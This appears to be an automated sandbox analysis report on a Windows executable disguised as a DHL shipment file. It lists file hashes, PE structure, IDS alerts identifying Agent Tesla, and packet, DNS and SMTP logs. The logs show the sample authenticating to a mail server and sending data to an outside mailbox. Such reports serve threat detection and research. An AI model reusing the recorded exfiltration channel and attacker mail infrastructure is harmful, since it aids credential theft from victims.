                                              File name:DHL_1003671162.exe
                                              File size:840'704 bytes
                                              MD5:1d584d84d4965e7a0da615b32ab85f2e
                                              SHA1:bbb9c2211444450bb34a27f1a98d778e3c96b9bb
                                              SHA256:061087cd835abcfc3411f0ec4b15ccf80516276a356b2eedc4cb444d0dac0187
                                              SHA512:69c79f42f6f91ab4ea8f2fc8d80c2423450fb8fc5b9bcb7a0dd0cd3c11167947402e7d027ccfd5ec4a7303ac3f269defdd7a63902272d6b60c660500c84ebbc8
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              TLSH:83059BCD27C9D552E2ED3D70D00D53F10F2CEC1214D2DACA9B6A719A8AB9B8BD512873
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L'f.................4...........R... ...`....@.. ....................... ............@................................

                                              File Icon

                                              Icon Hash:1761c261b0702917

                                              Static PE Info

                                              General

                                              Entrypoint:0x4a52a2
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66274CBA [Tue Apr 23 05:52:58 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa52480x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x29bc8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xa32a80xa3400ec292dba19025f294bdd1f4c68d141c3False0.9647315873851455data7.970864904869302IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xa60000x29bc80x29c00bc5387ea546ed2648930a87ebc8bdd6aFalse0.12335095434131736data3.144106503394127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xd00000xc0x2001f38e27bb5ec139155935cd0f944c5fcFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xa62b00x1c04PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9959564974902398
                                              RT_ICON0xa7eb40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.04662545841713001
                                              RT_ICON0xb86dc0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.07381227664494429
                                              RT_ICON0xc1b840x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.08701478743068392
                                              RT_ICON0xc700c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.08915918752952291
                                              RT_ICON0xcb2340x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.15508298755186722
                                              RT_ICON0xcd7dc0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.18714821763602252
                                              RT_ICON0xce8840x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.30901639344262294
                                              RT_ICON0xcf20c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.39184397163120566
                                              RT_GROUP_ICON0xcf6740x84data0.696969696969697
                                              RT_VERSION0xcf6f80x31cdata0.4484924623115578
                                              RT_MANIFEST0xcfa140x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              04/24/24-07:15:28.935178TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49738587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872020TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49743587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249736587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49736587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49736587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003229TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49733587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003229TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49733587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872156TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249743587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003170TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49733587192.168.2.450.87.253.239
                                              04/24/24-07:15:28.935275TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49738587192.168.2.450.87.253.239
                                              04/24/24-07:15:28.935275TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49738587192.168.2.450.87.253.239
                                              04/24/24-07:15:28.935178TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49738587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872020TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49743587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49736587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49736587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872156TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49743587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003170TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49733587192.168.2.450.87.253.239
                                              04/24/24-07:15:28.935275TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49738587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003229TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249733587192.168.2.450.87.253.239
                                              04/24/24-07:15:17.806983TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49736587192.168.2.450.87.253.239
                                              04/24/24-07:15:15.003229TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49733587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872156TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49743587192.168.2.450.87.253.239
                                              04/24/24-07:15:34.872156TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49743587192.168.2.450.87.253.239
                                              04/24/24-07:15:28.935275TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249738587192.168.2.450.87.253.239

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 24, 2024 07:15:13.244055986 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:13.423424959 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:13.423521996 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:13.734996080 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:13.736385107 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:13.916255951 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:13.917087078 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:14.096846104 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.097142935 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:14.317286015 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.378309011 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.385091066 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:14.564870119 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.564886093 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.565119028 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:14.785360098 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.814960003 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:14.822933912 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:15.002466917 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:15.002629042 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:15.003170013 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:15.003228903 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:15.003252029 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:15.003284931 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:15.183311939 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:15.183490992 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:15.187161922 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:15.230120897 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:16.224581003 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:16.403007030 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:16.403162003 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:16.637136936 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:16.637379885 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:16.816615105 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:16.816907883 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:16.996493101 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:16.996889114 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.177126884 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.177360058 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.356554985 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.364828110 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.584424973 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.624378920 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.624610901 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.803133011 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.803246021 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.806982994 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.806982994 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.806982994 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.806982994 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:17.985846043 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:17.987016916 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:18.042663097 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:27.348608971 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:27.530595064 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:27.530719042 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:27.764365911 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:27.765461922 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:27.947149992 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:27.947813034 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.129539967 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.129781008 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.313100100 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.313327074 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.496345043 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.497138977 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.720385075 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.752859116 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.753038883 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.934345007 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.934531927 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:28.935178041 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.935275078 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.935275078 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:28.935275078 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:29.116554022 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:29.122786999 CEST5874973850.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:29.355155945 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:33.288604021 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:33.469515085 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:33.469770908 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:33.704209089 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:33.704473972 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:33.886003017 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:33.886524916 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.067881107 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.068387032 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.251960993 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.252203941 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.433307886 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.433759928 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.656347990 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.689373970 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.689536095 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.870450974 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.870702982 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:34.872020006 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872155905 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872194052 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:34.872208118 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:35.053040981 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:35.054368973 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:15:35.098263025 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:15:35.289902925 CEST49738587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.131306887 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.352382898 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:53.512456894 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:53.512608051 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.516752005 CEST49733587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:53.696897030 CEST5874973350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.215698004 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.434331894 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.595748901 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:16:56.595841885 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.599314928 CEST49736587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:16:56.777652025 CEST5874973650.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.308809042 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.530256987 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.691904068 CEST5874974350.87.253.239192.168.2.4
                                              Apr 24, 2024 07:17:13.692084074 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.692240953 CEST49743587192.168.2.450.87.253.239
                                              Apr 24, 2024 07:17:13.873070002 CEST5874974350.87.253.239192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 24, 2024 07:15:12.932060957 CEST5904653192.168.2.41.1.1.1
                                              Apr 24, 2024 07:15:13.186793089 CEST53590461.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 24, 2024 07:15:12.932060957 CEST192.168.2.41.1.1.10xa30fStandard query (0)mail.clslk.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 24, 2024 07:15:13.186793089 CEST1.1.1.1192.168.2.40xa30fNo error (0)mail.clslk.com50.87.253.239A (IP address)IN (0x0001)false

                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Apr 24, 2024 07:15:13.734996080 CEST5874973350.87.253.239192.168.2.4220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:13 -0600
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 24, 2024 07:15:13.736385107 CEST49733587192.168.2.450.87.253.239EHLO 688098
                                              Apr 24, 2024 07:15:13.916255951 CEST5874973350.87.253.239192.168.2.4250-box2224.bluehost.com Hello 688098 [154.16.105.36]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 24, 2024 07:15:13.917087078 CEST49733587192.168.2.450.87.253.239AUTH login Z21AY2xzbGsuY29t
                                              Apr 24, 2024 07:15:14.096846104 CEST5874973350.87.253.239192.168.2.4334 UGFzc3dvcmQ6
                                              Apr 24, 2024 07:15:14.378309011 CEST5874973350.87.253.239192.168.2.4235 Authentication succeeded
                                              Apr 24, 2024 07:15:14.385091066 CEST49733587192.168.2.450.87.253.239MAIL FROM:<gm@clslk.com>
                                              Apr 24, 2024 07:15:14.564886093 CEST5874973350.87.253.239192.168.2.4250 OK
                                              Apr 24, 2024 07:15:14.565119028 CEST49733587192.168.2.450.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                              Apr 24, 2024 07:15:14.814960003 CEST5874973350.87.253.239192.168.2.4250 Accepted
                                              Apr 24, 2024 07:15:14.822933912 CEST49733587192.168.2.450.87.253.239DATA
                                              Apr 24, 2024 07:15:15.002629042 CEST5874973350.87.253.239192.168.2.4354 Enter message, ending with "." on a line by itself
                                              Apr 24, 2024 07:15:15.003284931 CEST49733587192.168.2.450.87.253.239.
                                              Apr 24, 2024 07:15:15.187161922 CEST5874973350.87.253.239192.168.2.4250 OK id=1rzUyQ-002xiT-2x
                                              Apr 24, 2024 07:15:16.637136936 CEST5874973650.87.253.239192.168.2.4220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:16 -0600
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 24, 2024 07:15:16.637379885 CEST49736587192.168.2.450.87.253.239EHLO 688098
                                              Apr 24, 2024 07:15:16.816615105 CEST5874973650.87.253.239192.168.2.4250-box2224.bluehost.com Hello 688098 [154.16.105.36]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 24, 2024 07:15:16.816907883 CEST49736587192.168.2.450.87.253.239AUTH login Z21AY2xzbGsuY29t
                                              Apr 24, 2024 07:15:16.996493101 CEST5874973650.87.253.239192.168.2.4334 UGFzc3dvcmQ6
                                              Apr 24, 2024 07:15:17.177126884 CEST5874973650.87.253.239192.168.2.4235 Authentication succeeded
                                              Apr 24, 2024 07:15:17.177360058 CEST49736587192.168.2.450.87.253.239MAIL FROM:<gm@clslk.com>
                                              Apr 24, 2024 07:15:17.356554985 CEST5874973650.87.253.239192.168.2.4250 OK
                                              Apr 24, 2024 07:15:17.364828110 CEST49736587192.168.2.450.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                              Apr 24, 2024 07:15:17.624378920 CEST5874973650.87.253.239192.168.2.4250 Accepted
                                              Apr 24, 2024 07:15:17.624610901 CEST49736587192.168.2.450.87.253.239DATA
                                              Apr 24, 2024 07:15:17.803246021 CEST5874973650.87.253.239192.168.2.4354 Enter message, ending with "." on a line by itself
                                              Apr 24, 2024 07:15:17.806982994 CEST49736587192.168.2.450.87.253.239.
                                              Apr 24, 2024 07:15:17.987016916 CEST5874973650.87.253.239192.168.2.4250 OK id=1rzUyT-002xmM-2J
                                              Apr 24, 2024 07:15:27.764365911 CEST5874973850.87.253.239192.168.2.4220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:27 -0600
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 24, 2024 07:15:27.765461922 CEST49738587192.168.2.450.87.253.239EHLO 688098
                                              Apr 24, 2024 07:15:27.947149992 CEST5874973850.87.253.239192.168.2.4250-box2224.bluehost.com Hello 688098 [154.16.105.36]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 24, 2024 07:15:27.947813034 CEST49738587192.168.2.450.87.253.239AUTH login Z21AY2xzbGsuY29t
                                              Apr 24, 2024 07:15:28.129539967 CEST5874973850.87.253.239192.168.2.4334 UGFzc3dvcmQ6
                                              Apr 24, 2024 07:15:28.313100100 CEST5874973850.87.253.239192.168.2.4235 Authentication succeeded
                                              Apr 24, 2024 07:15:28.313327074 CEST49738587192.168.2.450.87.253.239MAIL FROM:<gm@clslk.com>
                                              Apr 24, 2024 07:15:28.496345043 CEST5874973850.87.253.239192.168.2.4250 OK
                                              Apr 24, 2024 07:15:28.497138977 CEST49738587192.168.2.450.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                              Apr 24, 2024 07:15:28.752859116 CEST5874973850.87.253.239192.168.2.4250 Accepted
                                              Apr 24, 2024 07:15:28.753038883 CEST49738587192.168.2.450.87.253.239DATA
                                              Apr 24, 2024 07:15:28.934531927 CEST5874973850.87.253.239192.168.2.4354 Enter message, ending with "." on a line by itself
                                              Apr 24, 2024 07:15:28.935275078 CEST49738587192.168.2.450.87.253.239.
                                              Apr 24, 2024 07:15:29.122786999 CEST5874973850.87.253.239192.168.2.4250 OK id=1rzUye-002xxm-2j
                                              Apr 24, 2024 07:15:33.704209089 CEST5874974350.87.253.239192.168.2.4220-box2224.bluehost.com ESMTP Exim 4.96.2 #2 Tue, 23 Apr 2024 23:15:33 -0600
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Apr 24, 2024 07:15:33.704473972 CEST49743587192.168.2.450.87.253.239EHLO 688098
                                              Apr 24, 2024 07:15:33.886003017 CEST5874974350.87.253.239192.168.2.4250-box2224.bluehost.com Hello 688098 [154.16.105.36]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Apr 24, 2024 07:15:33.886524916 CEST49743587192.168.2.450.87.253.239AUTH login Z21AY2xzbGsuY29t
                                              Apr 24, 2024 07:15:34.067881107 CEST5874974350.87.253.239192.168.2.4334 UGFzc3dvcmQ6
